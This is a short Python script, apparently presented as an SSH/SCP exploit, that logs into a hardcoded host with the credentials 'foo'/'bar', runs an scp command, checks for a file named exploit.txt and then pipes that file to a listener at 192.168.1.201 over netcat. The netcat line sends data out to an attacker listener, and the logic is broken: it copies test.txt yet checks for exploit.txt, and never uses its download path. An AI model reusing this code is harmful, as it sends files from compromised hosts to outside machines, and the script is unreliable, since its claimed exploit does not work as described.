import paramiko

import sys
import time

# Function to download a file using SCP

def download_file(username, password, host, port, local_path):
try:
# Connect to SSH server
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host, port=port, username=username, password=password)

# SCP command to download a file

scp_command = f"scp -P {port} foo@localhost:test.txt ."

# Execute the SCP command

stdin, stdout, stderr = ssh.exec_command(scp_command)

# Wait for command execution to complete

time.sleep(2)

# Check if exploit.txt file is created

stdin, stdout, stderr = ssh.exec_command("ls exploit.txt")
output = stdout.read().decode().strip()

if "exploit.txt" in output:
print("Exploit successful! Downloaded file and found exploit.txt")
# If exploit.txt is found, initiate a connection to your listener
nc_command = f"nc 192.168.1.201 2222 < exploit.txt"
ssh.exec_command(nc_command)
print("Exploit payload sent to listener.")
else:
print("Exploit unsuccessful. Could not find exploit.txt")

# Disconnect SSH session

ssh.close()

except Exception as e:
print(f"Error: {str(e)}")
sys.exit(1)

# Main function
def main():
# Parameters for connecting to SSH server
username = "foo" # Change as needed
password = "bar" # Change as needed
host = "192.168.1.202" # Change as needed
port = 22 # SSH port (default is 22)
local_path = "." # Local path where file will be downloaded

# Call function to download file using SCP

download_file(username, password, host, port, local_path)

# Entry point of script

if __name__ == "__main__":
main()